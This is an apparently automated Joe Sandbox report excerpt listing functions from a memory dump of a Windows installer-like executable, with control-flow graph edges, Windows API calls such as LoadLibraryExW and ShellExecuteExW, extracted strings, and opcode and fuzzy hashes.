                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                                                                            • String ID:
                                                                                                            • API String ID: 869497890-0
                                                                                                            • Opcode ID: 40eb428aef5ca3917cae0dfe5bde1ecc7f4abfd34813d200a2b69c957a884b48
                                                                                                            • Instruction ID: 9244c5ba506deac9cdef27af3507f7e372f3b12bbed28f50cb5bede78b80ad7a
                                                                                                            • Opcode Fuzzy Hash: 40eb428aef5ca3917cae0dfe5bde1ecc7f4abfd34813d200a2b69c957a884b48
                                                                                                            • Instruction Fuzzy Hash: 3841D732A18A8666DA24AF35D4802F9A3B1FB047B4F804331EEBD077C5DF2CD5559B10
                                                                                                            Function 00007FF7390CDE90 Relevance: 2.8, Strings: 2, Instructions: 335COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: c$ymv
                                                                                                            • API String ID: 0-99963093
                                                                                                            • Opcode ID: 68b2d3110bacd5a6be4a4e8eec8d9ee3aa88b95b579965d8297be38a052521a8
                                                                                                            • Instruction ID: b6de3b916d809579071b23d7e6f8ae590c11c959dbd4cf2b84d28ca4d901ea3a
                                                                                                            • Opcode Fuzzy Hash: 68b2d3110bacd5a6be4a4e8eec8d9ee3aa88b95b579965d8297be38a052521a8
                                                                                                            • Instruction Fuzzy Hash: 68E1C733A186529BE724DF29D4402ADB7B2F788748F904139EA9957B88DB3CE941DF10
                                                                                                            Function 00007FF7390CEA88 Relevance: 1.7, Strings: 1, Instructions: 494COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ymv
                                                                                                            • API String ID: 0-3444853550
                                                                                                            • Opcode ID: e629740dfe6d7b0e431067c2527eb12d1d0e70a78347c535cc27eb69a34de26a
                                                                                                            • Instruction ID: c28ddde70a3336e1926a647cc54a8732ff235f0734d3c494787a920721f61348
                                                                                                            • Opcode Fuzzy Hash: e629740dfe6d7b0e431067c2527eb12d1d0e70a78347c535cc27eb69a34de26a
                                                                                                            • Instruction Fuzzy Hash: B922E472E0D613A2EA10AF14E84017DE7B7BF80794F940635DB9E5B6D4DE3DE801AB20
                                                                                                            Function 00007FF7390D9330 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 801 7ff7390d9330-7ff7390d93b9 call 7ff7390d8f8c 804 7ff7390d93e4-7ff7390d9401 801->804 805 7ff7390d93bb-7ff7390d93df call 7ff7390d929c RaiseException 801->805 807 7ff7390d9403-7ff7390d9414 804->807 808 7ff7390d9416-7ff7390d941a 804->808 811 7ff7390d95e8-7ff7390d9605 805->811 810 7ff7390d941d-7ff7390d9429 807->810 808->810 812 7ff7390d942b-7ff7390d943d 810->812 813 7ff7390d944a-7ff7390d944d 810->813 825 7ff7390d9443 812->825 826 7ff7390d95b9-7ff7390d95c3 812->826 814 7ff7390d94f4-7ff7390d94fb 813->814 815 7ff7390d9453-7ff7390d9456 813->815 817 7ff7390d950f-7ff7390d9512 814->817 818 7ff7390d94fd-7ff7390d950c 814->818 819 7ff7390d946d-7ff7390d9482 LoadLibraryExA 815->819 820 7ff7390d9458-7ff7390d946b 815->820 821 7ff7390d95b5 817->821 822 7ff7390d9518-7ff7390d951c 817->822 818->817 823 7ff7390d9484-7ff7390d9497 GetLastError 819->823 824 7ff7390d94d9-7ff7390d94e2 819->824 820->819 820->824 821->826 829 7ff7390d954b-7ff7390d955e GetProcAddress 822->829 830 7ff7390d951e-7ff7390d9522 822->830 831 7ff7390d94ae-7ff7390d94d4 call 7ff7390d929c RaiseException 823->831 832 7ff7390d9499-7ff7390d94ac 823->832 835 7ff7390d94e4-7ff7390d94e7 FreeLibrary 824->835 836 7ff7390d94ed 824->836 825->813 833 7ff7390d95c5-7ff7390d95d6 826->833 834 7ff7390d95e0 call 7ff7390d929c 826->834 829->821 840 7ff7390d9560-7ff7390d9573 GetLastError 829->840 830->829 837 7ff7390d9524-7ff7390d952f 830->837 831->811 832->824 832->831 833->834 843 7ff7390d95e5 834->843 835->836 836->814 837->829 841 7ff7390d9531-7ff7390d9538 837->841 845 7ff7390d9575-7ff7390d9588 840->845 846 7ff7390d958a-7ff7390d95b1 call 7ff7390d929c RaiseException call 7ff7390d8f8c 840->846 841->829 847 7ff7390d953a-7ff7390d953f 841->847 843->811 845->821 845->846 846->821 847->829 849 7ff7390d9541-7ff7390d9549 847->849 849->821 849->829
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                                                                            • String ID: H
                                                                                                            • API String ID: 282135826-2852464175
                                                                                                            • Opcode ID: 5fe5478eb90cf9c1720b92daf6ddd11e55ceb0942146135e6184d1e9ca552fe8
                                                                                                            • Instruction ID: 7862d4c14dddb8ce8e5514da6f799c83cf92dc84945df0d69fd24d534c2eb5c7
                                                                                                            • Opcode Fuzzy Hash: 5fe5478eb90cf9c1720b92daf6ddd11e55ceb0942146135e6184d1e9ca552fe8
                                                                                                            • Instruction Fuzzy Hash: 66914B32E16B17AAEB44EF61D8446A8B3B2BF08788F844435DE5D17758EF38E845D720
                                                                                                            Function 00007FF7390C52AC Relevance: 21.6, APIs: 2, Strings: 10, Instructions: 560COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1390 7ff7390c52ac-7ff7390c52fa call 7ff7390d9920 call 7ff7390db498 1395 7ff7390c5337-7ff7390c5347 call 7ff7390c8168 1390->1395 1396 7ff7390c52fc-7ff7390c5335 GetModuleFileNameW call 7ff7390c48d0 call 7ff7390c8124 1390->1396 1399 7ff7390c534c-7ff7390c536e call 7ff7390c200c call 7ff7390c2420 1395->1399 1396->1399 1407 7ff7390c5bf5-7ff7390c5bf9 call 7ff7390c2054 1399->1407 1408 7ff7390c5374-7ff7390c5382 1399->1408 1412 7ff7390c5bfe-7ff7390c5c27 call 7ff7390d98e0 1407->1412 1410 7ff7390c53a6-7ff7390c53de call 7ff7390e13c0 * 2 1408->1410 1411 7ff7390c5384-7ff7390c53a4 call 7ff7390c5c74 * 2 1408->1411 1423 7ff7390c53e1-7ff7390c53e4 1410->1423 1411->1410 1424 7ff7390c5514-7ff7390c5533 call 7ff7390c2900 call 7ff7390e11dc 1423->1424 1425 7ff7390c53ea-7ff7390c541d call 7ff7390c2a10 call 7ff7390c2740 1423->1425 1424->1407 1434 7ff7390c5539-7ff7390c5557 call 7ff7390c2740 1424->1434 1435 7ff7390c54e5-7ff7390c54f6 call 7ff7390c2900 1425->1435 1436 7ff7390c5423-7ff7390c542b 1425->1436 1450 7ff7390c5563-7ff7390c5576 call 7ff7390e11dc 1434->1450 1451 7ff7390c5559-7ff7390c5561 1434->1451 1445 7ff7390c54fb-7ff7390c5505 1435->1445 1438 7ff7390c542d-7ff7390c5435 1436->1438 1439 7ff7390c545b-7ff7390c5464 1436->1439 1438->1439 1442 7ff7390c5437-7ff7390c5455 call 7ff7390e1850 1438->1442 1443 7ff7390c5496-7ff7390c549e 1439->1443 1444 7ff7390c5466-7ff7390c5475 1439->1444 1442->1439 1463 7ff7390c54e1 1442->1463 1448 7ff7390c54a0-7ff7390c54a8 1443->1448 1449 7ff7390c54ce-7ff7390c54d5 1443->1449 1444->1443 1446 7ff7390c5477-7ff7390c547e 1444->1446 1445->1423 1447 7ff7390c550b-7ff7390c550e 1445->1447 1446->1443 1453 7ff7390c5480-7ff7390c5494 call 7ff7390e1130 1446->1453 1447->1407 1447->1424 1448->1449 1454 7ff7390c54aa-7ff7390c54c8 call 7ff7390e1850 1448->1454 1449->1435 1455 7ff7390c54d7 1449->1455 1450->1407 1467 7ff7390c557c-7ff7390c5597 call 7ff7390c9404 call 7ff7390dea98 1450->1467 1456 7ff7390c559a-7ff7390c55dc call 7ff7390c80f8 call 7ff7390e11dc 1451->1456 1453->1443 1468 7ff7390c54dc 1453->1468 1454->1407 1454->1449 1455->1436 1474 7ff7390c55de-7ff7390c55e6 call 7ff7390dea98 1456->1474 1475 7ff7390c55eb-7ff7390c5608 1456->1475 1463->1435 1467->1456 1468->1463 1474->1407 1478 7ff7390c5ab6-7ff7390c5ab9 1475->1478 1479 7ff7390c560e-7ff7390c561b 1475->1479 1480 7ff7390c5ac1-7ff7390c5ac9 1478->1480 1482 7ff7390c5621-7ff7390c5627 1479->1482 1483 7ff7390c5944-7ff7390c594f 1479->1483 1484 7ff7390c5acf-7ff7390c5aea call 7ff7390e4088 1480->1484 1485 7ff7390c5b74-7ff7390c5b8c call 7ff7390dea98 * 2 1480->1485 1486 7ff7390c5635-7ff7390c563b 1482->1486 1487 7ff7390c5629-7ff7390c562f 1482->1487 1488 7ff7390c5955-7ff7390c595f 1483->1488 1489 7ff7390c5abb 1483->1489 1511 7ff7390c5b2c-7ff7390c5b6f call 7ff7390e2884 call 7ff7390c5c30 1484->1511 1512 7ff7390c5aec-7ff7390c5af4 1484->1512 1533 7ff7390c5bb1-7ff7390c5bf4 call 7ff7390e13c0 * 2 1485->1533 1534 7ff7390c5b8e-7ff7390c5baf call 7ff7390c5c74 * 2 1485->1534 1494 7ff7390c5641-7ff7390c5681 1486->1494 1495 7ff7390c5808-7ff7390c5818 call 7ff7390c7f28 1486->1495 1487->1483 1487->1486 1490 7ff7390c5961-7ff7390c5967 1488->1490 1491 7ff7390c59bf-7ff7390c59c3 1488->1491 1489->1480 1497 7ff7390c56ff-7ff7390c570a 1490->1497 1498 7ff7390c596d-7ff7390c5975 1490->1498 1502 7ff7390c59c5-7ff7390c59c9 1491->1502 1503 7ff7390c59e3-7ff7390c59e9 1491->1503 1496 7ff7390c5688-7ff7390c56aa call 7ff7390de7d8 call 7ff7390e1130 1494->1496 1522 7ff7390c592e-7ff7390c5940 1495->1522 1523 7ff7390c581e-7ff7390c584c call 7ff7390c8168 call 7ff7390e11a4 1495->1523 1549 7ff7390c56ca 1496->1549 1550 7ff7390c56ac-7ff7390c56bb 1496->1550 1497->1480 1513 7ff7390c5710-7ff7390c5719 1497->1513 1505 7ff7390c5977-7ff7390c597b 1498->1505 1506 7ff7390c59ab 1498->1506 1502->1503 1514 7ff7390c59cb-7ff7390c59d1 1502->1514 1507 7ff7390c59ef-7ff7390c5a0b call 7ff7390e4088 1503->1507 1508 7ff7390c5a9d 1503->1508 1517 7ff7390c59a4-7ff7390c59a9 1505->1517 1518 7ff7390c597d-7ff7390c5981 1505->1518 1525 7ff7390c59b0-7ff7390c59b8 1506->1525 1541 7ff7390c5a4d 1507->1541 1542 7ff7390c5a0d-7ff7390c5a15 1507->1542 1520 7ff7390c5aa3-7ff7390c5aaf 1508->1520 1511->1485 1526 7ff7390c5afa-7ff7390c5afe 1512->1526 1513->1479 1514->1497 1515 7ff7390c59d7-7ff7390c59de 1514->1515 1517->1525 1528 7ff7390c5983-7ff7390c5987 1518->1528 1529 7ff7390c599d-7ff7390c59a2 1518->1529 1520->1478 1522->1483 1523->1522 1568 7ff7390c5852-7ff7390c58e1 call 7ff7390c96d0 call 7ff7390c80f8 call 7ff7390c809c call 7ff7390c80f8 call 7ff7390e11ec 1523->1568 1525->1491 1535 7ff7390c5b00-7ff7390c5b04 1526->1535 1536 7ff7390c5b06-7ff7390c5b11 1526->1536 1539 7ff7390c5996-7ff7390c599b 1528->1539 1540 7ff7390c5989-7ff7390c598d 1528->1540 1529->1525 1533->1407 1534->1533 1535->1536 1546 7ff7390c5b13-7ff7390c5b1c 1535->1546 1536->1526 1536->1546 1539->1525 1540->1515 1551 7ff7390c598f-7ff7390c5994 1540->1551 1554 7ff7390c5a53-7ff7390c5a9b call 7ff7390e2884 call 7ff7390c5c30 1541->1554 1552 7ff7390c5a1a-7ff7390c5a1e 1542->1552 1546->1511 1547 7ff7390c5b1e-7ff7390c5b24 1546->1547 1547->1511 1556 7ff7390c5b26 1547->1556 1561 7ff7390c56ce-7ff7390c56d9 1549->1561 1550->1549 1558 7ff7390c56bd-7ff7390c56c8 1550->1558 1551->1525 1559 7ff7390c5a20-7ff7390c5a23 1552->1559 1560 7ff7390c5a25-7ff7390c5a30 1552->1560 1554->1520 1556->1511 1558->1561 1559->1560 1566 7ff7390c5a32-7ff7390c5a3b 1559->1566 1560->1552 1560->1566 1561->1496 1567 7ff7390c56db-7ff7390c56e2 1561->1567 1566->1554 1572 7ff7390c5a3d-7ff7390c5a43 1566->1572 1573 7ff7390c56e4-7ff7390c56f6 call 7ff7390c80f8 1567->1573 1574 7ff7390c571e 1567->1574 1607 7ff7390c58e3-7ff7390c58f3 1568->1607 1608 7ff7390c58f7-7ff7390c590a 1568->1608 1572->1554 1578 7ff7390c5a45-7ff7390c5a4b 1572->1578 1582 7ff7390c56fb 1573->1582 1574->1495 1576 7ff7390c5724 1574->1576 1581 7ff7390c5729-7ff7390c5735 1576->1581 1578->1554 1584 7ff7390c5737-7ff7390c573a 1581->1584 1585 7ff7390c573c-7ff7390c573f 1581->1585 1582->1497 1584->1585 1588 7ff7390c5741-7ff7390c5748 1584->1588 1585->1581 1590 7ff7390c5771-7ff7390c577f 1588->1590 1591 7ff7390c574a-7ff7390c5754 1588->1591 1594 7ff7390c5785-7ff7390c57b0 call 7ff7390c96d0 1590->1594 1595 7ff7390c5c28-7ff7390c5c2f call 7ff7390d9ae4 1590->1595 1593 7ff7390c5757-7ff7390c575b 1591->1593 1593->1590 1597 7ff7390c575d-7ff7390c576f 1593->1597 1604 7ff7390c57b2-7ff7390c57d1 call 7ff7390e10f8 1594->1604 1605 7ff7390c57d6-7ff7390c5803 call 7ff7390c60c0 1594->1605 1597->1590 1597->1593 1604->1582 1605->1495 1607->1608 1611 7ff7390c5910-7ff7390c5916 1608->1611 1613 7ff7390c591f-7ff7390c5922 1611->1613 1614 7ff7390c5918-7ff7390c591d 1611->1614 1613->1611 1614->1613 1615 7ff7390c5924 1614->1615 1615->1522
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,00007FF7390C528A), ref: 00007FF7390C530B
                                                                                                              • Part of subcall function 00007FF7390C9404: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7390C44A3), ref: 00007FF7390C9431
                                                                                                            • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7390C57FE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileModuleMultiNameWide_snwprintf
                                                                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                            • API String ID: 2679931996-2291855099
                                                                                                            • Opcode ID: fb50c3c6d6875e4d5d079e6f049e2d50bfcdeedac347f0793b1bbedacef97ed1
                                                                                                            • Instruction ID: fd1468aba6353064dd30b0eb47564d6d59fc80927de0fe0938068d6124b91067
                                                                                                            • Opcode Fuzzy Hash: fb50c3c6d6875e4d5d079e6f049e2d50bfcdeedac347f0793b1bbedacef97ed1
                                                                                                            • Instruction Fuzzy Hash: A942C126A1DA83A5EB20EF64D4442FDA3B6FF04788FC04131DA8D4B695EF28E645E750
                                                                                                            Function 00007FF7390D7858 Relevance: 16.6, APIs: 11, Instructions: 99windowCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3569833718-0
                                                                                                            • Opcode ID: c858b7b174eac9beea2967423eff78e7a95d71771b06d736f21859ddeeb7e30f
                                                                                                            • Instruction ID: 94592caf69a101706297a73bd9499beb920cb138362f5f4040d6db478f85d10c
                                                                                                            • Opcode Fuzzy Hash: c858b7b174eac9beea2967423eff78e7a95d71771b06d736f21859ddeeb7e30f
                                                                                                            • Instruction Fuzzy Hash: A041B232B14642AAF710AF65F810BAA6772EB49B88FC41130DD5E17B99CE7ED409D720
                                                                                                            Function 00007FF7390D7C34 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 178COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1654 7ff7390d7c34-7ff7390d7c79 call 7ff7390d9920 1657 7ff7390d7c7f-7ff7390d7c8d call 7ff7390de7d8 1654->1657 1658 7ff7390d7ec2-7ff7390d7ee7 call 7ff7390d98e0 1654->1658 1657->1658 1663 7ff7390d7c93-7ff7390d7cdd call 7ff7390da940 1657->1663 1666 7ff7390d7cdf 1663->1666 1667 7ff7390d7d2e 1663->1667 1669 7ff7390d7ce4-7ff7390d7ce8 1666->1669 1668 7ff7390d7d33-7ff7390d7d36 1667->1668 1670 7ff7390d7d3e-7ff7390d7d41 1668->1670 1671 7ff7390d7d38-7ff7390d7d3c 1668->1671 1672 7ff7390d7d05-7ff7390d7d12 1669->1672 1673 7ff7390d7cea 1669->1673 1676 7ff7390d7d5b-7ff7390d7d6d call 7ff7390c4304 1670->1676 1677 7ff7390d7d43-7ff7390d7d56 1670->1677 1671->1670 1671->1676 1674 7ff7390d7ee8 1672->1674 1675 7ff7390d7d18-7ff7390d7d1c 1672->1675 1678 7ff7390d7cf2-7ff7390d7cfc 1673->1678 1682 7ff7390d7eed-7ff7390d7ef2 1674->1682 1681 7ff7390d7d22-7ff7390d7d2c 1675->1681 1675->1682 1686 7ff7390d7d6f-7ff7390d7d8d call 7ff7390c9878 1676->1686 1687 7ff7390d7d92-7ff7390d7d9e call 7ff7390c3120 1676->1687 1677->1676 1679 7ff7390d7cec-7ff7390d7cf0 1678->1679 1680 7ff7390d7cfe 1678->1680 1679->1678 1685 7ff7390d7d00 1679->1685 1680->1672 1681->1667 1681->1669 1682->1668 1685->1672 1686->1687 1692 7ff7390d7da0-7ff7390d7db8 call 7ff7390c3ff0 1687->1692 1693 7ff7390d7dbd-7ff7390d7dca ShellExecuteExW 1687->1693 1692->1693 1693->1658 1695 7ff7390d7dd0-7ff7390d7dda 1693->1695 1697 7ff7390d7ddc-7ff7390d7ddf 1695->1697 1698 7ff7390d7dea-7ff7390d7ded 1695->1698 1697->1698 1699 7ff7390d7de1-7ff7390d7de8 1697->1699 1700 7ff7390d7def-7ff7390d7dfa call 7ff739138140 1698->1700 1701 7ff7390d7e0a-7ff7390d7e29 call 7ff739138138 call 7ff7390d8190 1698->1701 1699->1698 1703 7ff7390d7e5f-7ff7390d7e6c CloseHandle 1699->1703 1700->1701 1713 7ff7390d7dfc-7ff7390d7e07 ShowWindow 1700->1713 1701->1703 1719 7ff7390d7e2b-7ff7390d7e2e 1701->1719 1706 7ff7390d7e81-7ff7390d7e88 1703->1706 1707 7ff7390d7e6e-7ff7390d7e7f call 7ff7390c9878 1703->1707 1711 7ff7390d7eaa-7ff7390d7ead 1706->1711 1712 7ff7390d7e8a-7ff7390d7e8d 1706->1712 1707->1706 1707->1711 1711->1658 1717 7ff7390d7eaf-7ff7390d7eb2 1711->1717 1712->1711 1716 7ff7390d7e8f-7ff7390d7ea4 1712->1716 1713->1701 1716->1711 1717->1658 1718 7ff7390d7eb4-7ff7390d7ebc ShowWindow 1717->1718 1718->1658 1719->1703 1720 7ff7390d7e30-7ff7390d7e41 GetExitCodeProcess 1719->1720 1720->1703 1721 7ff7390d7e43-7ff7390d7e59 1720->1721 1721->1703
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739105000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF739134000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306082105.00007FF739135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_7ff7390c0000_file.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell
                                                                                                            • String ID: .exe$.inf$Install$p
                                                                                                            • API String ID: 1828429325-3607691742
                                                                                                            • Opcode ID: 305ca70be6b33cf32ea0e45e225393cd92641b655afc5b24a116321abf008c87
                                                                                                            • Instruction ID: c4d057334121b19dcb2b151f20506e898127c4c9c91b4ebd36fa211b4027a09f
                                                                                                            • Opcode Fuzzy Hash: 305ca70be6b33cf32ea0e45e225393cd92641b655afc5b24a116321abf008c87
                                                                                                            • Instruction Fuzzy Hash: 9E718362A09647A5FB60BF19E4502B9F3B2FF88754FC44035D98E46694EF3DE840E720
                                                                                                            Function 00007FF7390DE3EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1722 7ff7390de3ec-7ff7390de42a 1723 7ff7390de430-7ff7390de433 1722->1723 1724 7ff7390de51b 1722->1724 1725 7ff7390de51d-7ff7390de539 1723->1725 1726 7ff7390de439 1723->1726 1724->1725 1727 7ff7390de43c 1726->1727 1728 7ff7390de513 1727->1728 1729 7ff7390de442-7ff7390de451 1727->1729 1728->1724 1730 7ff7390de453-7ff7390de456 1729->1730 1731 7ff7390de45e-7ff7390de47d LoadLibraryExW 1729->1731 1732 7ff7390de4f5-7ff7390de504 GetProcAddress 1730->1732 1733 7ff7390de45c 1730->1733 1734 7ff7390de4d5-7ff7390de4ea 1731->1734 1735 7ff7390de47f-7ff7390de488 GetLastError 1731->1735 1732->1728 1737 7ff7390de506-7ff7390de511 1732->1737 1738 7ff7390de4c9-7ff7390de4d0 1733->1738 1734->1732 1736 7ff7390de4ec-7ff7390de4ef FreeLibrary 1734->1736 1739 7ff7390de4b7-7ff7390de4c1 1735->1739 1740 7ff7390de48a-7ff7390de49f call 7ff7390e1130 1735->1740 1736->1732 1737->1725 1738->1727 1739->1738 1740->1739 1743 7ff7390de4a1-7ff7390de4b5 LoadLibraryExW 1740->1743 1743->1734 1743->1739
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNELBASE(?,?,00000000,00007FF7390DE5F3,?,?,?,00007FF7390DC35E,?,?,?,00007FF7390DC319), ref: 00007FF7390DE471
                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF7390DE5F3,?,?,?,00007FF7390DC35E,?,?,?,00007FF7390DC319), ref: 00007FF7390DE47F
                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7390DE5F3,?,?,?,00007FF7390DC35E,?,?,?,00007FF7390DC319), ref: 00007FF7390DE4A9
                                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00007FF7390DE5F3,?,?,?,00007FF7390DC35E,?,?,?,00007FF7390DC319), ref: 00007FF7390DE4EF
                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF7390DE5F3,?,?,?,00007FF7390DC35E,?,?,?,00007FF7390DC319), ref: 00007FF7390DE4FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1305949308.00007FF7390C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7390C0000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.1305919304.00007FF7390C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1305981237.00007FF7390EE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.1306004682.00007FF7390FE000.00000004.00000001.01000000.00000004.sdmpDownload File
